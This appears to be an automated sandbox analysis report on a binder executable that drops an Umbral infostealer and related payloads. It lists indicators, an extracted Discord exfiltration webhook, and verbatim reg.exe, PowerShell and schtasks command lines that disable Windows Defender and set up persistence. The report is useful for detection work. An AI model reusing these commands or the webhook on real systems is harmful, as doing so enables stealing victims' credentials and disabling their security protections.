Analysis
-
max time kernel
75s -
max time network
77s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
20-07-2024 13:12
Static task
static1
General
-
Target
XBinderOutput.exe
-
Size
15.7MB
-
MD5
f97888b27442ca3d39172b7c6b807452
-
SHA1
1e414410cd51c6a118209b6883923a844aabb73f
-
SHA256
58e72a5d8fa13efff7500e9bcdb98d73cd56ef214c1739bd09970921f69600d8
-
SHA512
ac53a3ef560de8c5e7ebe845f9a4e2a1792838de160349bb6f2ba614eea6986d302b470c17c5ee5cbb6c56d2c2bdeaec78a96bda1d0f157685d4d874818a00e1
-
SSDEEP
393216:XjKwRngl0YQi+q8d6CqRgY3ExKp7609UqSsMpBqqt8fFaCEA:XjrRglnQfwCqRgYUYp7L2cqC9a9A
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/4104-63-0x0000000000F10000-0x00000000014FA000-memory.dmp family_umbral behavioral1/memory/4104-64-0x0000000000F10000-0x00000000014FA000-memory.dmp family_umbral behavioral1/memory/4104-3257-0x0000000000F10000-0x00000000014FA000-memory.dmp family_umbral -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Micrasoft OneDrive.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ system32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Microsoft OneDrive.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ XClient.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5228 powershell.exe 860 powershell.exe 4276 powershell.exe 4636 powershell.exe 5736 powershell.exe 6064 powershell.exe 5756 powershell.exe 5604 powershell.exe 5456 powershell.exe 4216 powershell.exe 4080 powershell.exe 4344 powershell.exe 5504 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts system32.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Micrasoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Micrasoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Microsoft OneDrive.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Maicrasoft OneDrive.lnk Micrasoft OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Maicrasoft OneDrive.lnk Micrasoft OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk Microsoft OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk Microsoft OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk XClient.exe -
Executes dropped EXE 5 IoCs
pid Process 32 Micrasoft OneDrive.exe 208 FanUpdate.exe 4104 system32.exe 1888 Microsoft OneDrive.exe 4332 XClient.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine Micrasoft OneDrive.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine system32.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine Microsoft OneDrive.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine XClient.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000800000001ac45-13.dat vmprotect behavioral1/memory/208-17-0x0000000000AA0000-0x0000000001EFC000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunCheker = "C:\\Users\\Admin\\AppData\\Roaming\\FunCheker.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Maicrasoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Maicrasoft OneDrive.exe" Micrasoft OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft OneDrive.exe" Microsoft OneDrive.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XClient.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Micrasoft OneDrive.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA system32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 12 discord.com 13 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com 10 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Microsoft OneDrive.exe File opened for modification \??\PhysicalDrive0 system32.exe File opened for modification \??\PhysicalDrive0 XClient.exe File opened for modification \??\PhysicalDrive0 Micrasoft OneDrive.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 32 Micrasoft OneDrive.exe 1888 Microsoft OneDrive.exe 4104 system32.exe 4332 XClient.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5368 wmic.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3660 schtasks.exe 5236 schtasks.exe 5332 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 32 Micrasoft OneDrive.exe 32 Micrasoft OneDrive.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 1888 Microsoft OneDrive.exe 1888 Microsoft OneDrive.exe 4104 system32.exe 4104 system32.exe 4332 XClient.exe 4332 XClient.exe 3064 taskmgr.exe 3064 taskmgr.exe 4276 powershell.exe 4276 powershell.exe 4636 powershell.exe 4636 powershell.exe 3064 taskmgr.exe 3064 taskmgr.exe 4276 powershell.exe 4636 powershell.exe 4276 powershell.exe 4636 powershell.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 5756 powershell.exe 5756 powershell.exe 4080 powershell.exe 5756 powershell.exe 3064 taskmgr.exe 5756 powershell.exe 3064 taskmgr.exe 5604 powershell.exe 5604 powershell.exe 5604 powershell.exe 5604 powershell.exe 5304 powershell.exe 5304 powershell.exe 3064 taskmgr.exe 5456 powershell.exe 5456 powershell.exe 5304 powershell.exe 5456 powershell.exe 5304 powershell.exe 3064 taskmgr.exe 5456 powershell.exe 4344 powershell.exe 4344 powershell.exe 4344 powershell.exe 4344 powershell.exe 3064 taskmgr.exe 5428 powershell.exe 5428 powershell.exe 3064 taskmgr.exe 5428 powershell.exe 5428 powershell.exe 4216 powershell.exe 4216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 32 Micrasoft OneDrive.exe Token: SeDebugPrivilege 3064 taskmgr.exe Token: SeSystemProfilePrivilege 3064 taskmgr.exe Token: SeCreateGlobalPrivilege 3064 taskmgr.exe Token: SeDebugPrivilege 1888 Microsoft OneDrive.exe Token: SeDebugPrivilege 4332 XClient.exe Token: SeDebugPrivilege 4104 system32.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 5756 powershell.exe Token: SeDebugPrivilege 5604 powershell.exe Token: SeDebugPrivilege 5304 powershell.exe Token: SeDebugPrivilege 5456 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 5228 powershell.exe Token: SeDebugPrivilege 5736 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeDebugPrivilege 5504 powershell.exe Token: SeIncreaseQuotaPrivilege 700 wmic.exe Token: SeSecurityPrivilege 700 wmic.exe Token: SeTakeOwnershipPrivilege 700 wmic.exe Token: SeLoadDriverPrivilege 700 wmic.exe Token: SeSystemProfilePrivilege 700 wmic.exe Token: SeSystemtimePrivilege 700 wmic.exe Token: SeProfSingleProcessPrivilege 700 wmic.exe Token: SeIncBasePriorityPrivilege 700 wmic.exe Token: SeCreatePagefilePrivilege 700 wmic.exe Token: SeBackupPrivilege 700 wmic.exe Token: SeRestorePrivilege 700 wmic.exe Token: SeShutdownPrivilege 700 wmic.exe Token: SeDebugPrivilege 700 wmic.exe Token: SeSystemEnvironmentPrivilege 700 wmic.exe Token: SeRemoteShutdownPrivilege 700 wmic.exe Token: SeUndockPrivilege 700 wmic.exe Token: SeManageVolumePrivilege 700 wmic.exe Token: 33 700 wmic.exe Token: 34 700 wmic.exe Token: 35 700 wmic.exe Token: 36 700 wmic.exe Token: SeIncreaseQuotaPrivilege 700 wmic.exe Token: SeSecurityPrivilege 700 wmic.exe Token: SeTakeOwnershipPrivilege 700 wmic.exe Token: SeLoadDriverPrivilege 700 wmic.exe Token: SeSystemProfilePrivilege 700 wmic.exe Token: SeSystemtimePrivilege 700 wmic.exe Token: SeProfSingleProcessPrivilege 700 wmic.exe Token: SeIncBasePriorityPrivilege 700 wmic.exe Token: SeCreatePagefilePrivilege 700 wmic.exe Token: SeBackupPrivilege 700 wmic.exe Token: SeRestorePrivilege 700 wmic.exe Token: SeShutdownPrivilege 700 wmic.exe Token: SeDebugPrivilege 700 wmic.exe Token: SeSystemEnvironmentPrivilege 700 wmic.exe Token: SeRemoteShutdownPrivilege 700 wmic.exe Token: SeUndockPrivilege 700 wmic.exe Token: SeManageVolumePrivilege 700 wmic.exe Token: 33 700 wmic.exe Token: 34 700 wmic.exe Token: 35 700 wmic.exe Token: 36 700 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe 3064 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 32 Micrasoft OneDrive.exe 1888 Microsoft OneDrive.exe 4332 XClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2692 wrote to memory of 32 2692 XBinderOutput.exe 73 PID 2692 wrote to memory of 32 2692 XBinderOutput.exe 73 PID 2692 wrote to memory of 32 2692 XBinderOutput.exe 73 PID 2692 wrote to memory of 208 2692 XBinderOutput.exe 74 PID 2692 wrote to memory of 208 2692 XBinderOutput.exe 74 PID 208 wrote to memory of 4300 208 FanUpdate.exe 76 PID 208 wrote to memory of 4300 208 FanUpdate.exe 76 PID 208 wrote to memory of 2052 208 FanUpdate.exe 78 PID 208 wrote to memory of 2052 208 FanUpdate.exe 78 PID 208 wrote to memory of 1420 208 FanUpdate.exe 79 PID 208 wrote to memory of 1420 208 FanUpdate.exe 79 PID 208 wrote to memory of 3056 208 FanUpdate.exe 81 PID 208 wrote to memory of 3056 208 FanUpdate.exe 81 PID 208 wrote to memory of 4104 208 FanUpdate.exe 84 PID 208 wrote to memory of 4104 208 FanUpdate.exe 84 PID 208 wrote to memory of 4104 208 FanUpdate.exe 84 PID 208 wrote to memory of 1888 208 FanUpdate.exe 85 PID 208 wrote to memory of 1888 208 FanUpdate.exe 85 PID 208 wrote to memory of 1888 208 FanUpdate.exe 85 PID 208 wrote to memory of 4332 208 FanUpdate.exe 86 PID 208 wrote to memory of 4332 208 FanUpdate.exe 86 PID 208 wrote to memory of 4332 208 FanUpdate.exe 86 PID 4300 wrote to memory of 2036 4300 cmd.exe 87 PID 4300 wrote to memory of 2036 4300 cmd.exe 87 PID 3056 wrote to memory of 972 3056 cmd.exe 88 PID 3056 wrote to memory of 972 3056 cmd.exe 88 PID 4300 wrote to memory of 2184 4300 cmd.exe 90 PID 4300 wrote to memory of 2184 4300 cmd.exe 90 PID 4300 wrote to memory of 3872 4300 cmd.exe 116 PID 4300 wrote to memory of 3872 4300 cmd.exe 116 PID 4300 wrote to memory of 2504 4300 cmd.exe 92 PID 4300 wrote to memory of 2504 4300 cmd.exe 92 PID 4300 wrote to memory of 2420 4300 cmd.exe 93 PID 4300 wrote to memory of 2420 4300 cmd.exe 93 PID 4300 wrote to memory of 4904 4300 cmd.exe 94 PID 4300 wrote to memory of 4904 4300 cmd.exe 94 PID 4300 wrote to memory of 3364 4300 cmd.exe 95 PID 4300 wrote to memory of 3364 4300 cmd.exe 95 PID 4300 wrote to memory of 4080 4300 cmd.exe 121 PID 4300 wrote to memory of 4080 4300 cmd.exe 121 PID 4300 wrote to memory of 3144 4300 cmd.exe 97 PID 4300 wrote to memory of 3144 4300 cmd.exe 97 PID 4300 wrote to memory of 4260 4300 cmd.exe 98 PID 4300 wrote to memory of 4260 4300 cmd.exe 98 PID 4300 wrote to memory of 3516 4300 cmd.exe 99 PID 4300 wrote to memory of 3516 4300 cmd.exe 99 PID 4300 wrote to memory of 2124 4300 cmd.exe 100 PID 4300 wrote to memory of 2124 4300 cmd.exe 100 PID 4300 wrote to memory of 4112 4300 cmd.exe 102 PID 4300 wrote to memory of 4112 4300 cmd.exe 102 PID 4104 wrote to memory of 4276 4104 system32.exe 101 PID 4104 wrote to memory of 4276 4104 system32.exe 101 PID 4104 wrote to memory of 4276 4104 system32.exe 101 PID 4300 wrote to memory of 2260 4300 cmd.exe 115 PID 4300 wrote to memory of 2260 4300 cmd.exe 115 PID 4300 wrote to memory of 2256 4300 cmd.exe 105 PID 4300 wrote to memory of 2256 4300 cmd.exe 105 PID 4300 wrote to memory of 4388 4300 cmd.exe 106 PID 4300 wrote to memory of 4388 4300 cmd.exe 106 PID 4300 wrote to memory of 3660 4300 cmd.exe 107 PID 4300 wrote to memory of 3660 4300 cmd.exe 107 PID 32 wrote to memory of 4636 32 Micrasoft OneDrive.exe 108 PID 32 wrote to memory of 4636 32 Micrasoft OneDrive.exe 108 PID 32 wrote to memory of 4636 32 Micrasoft OneDrive.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Micrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5756
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Maicrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5736
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Maicrasoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FanUpdate.exe"C:\Users\Admin\AppData\Local\Temp\FanUpdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2036
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:3872
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:2504
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2420
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4904
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3364
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4080
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3144
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:4260
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:3516
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:2124
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:4112
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:2260
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:2256
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:4388
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:3660
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:4616
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:812
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:2144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:4892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:4652
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
- Modifies registry class
PID:2260
-
-
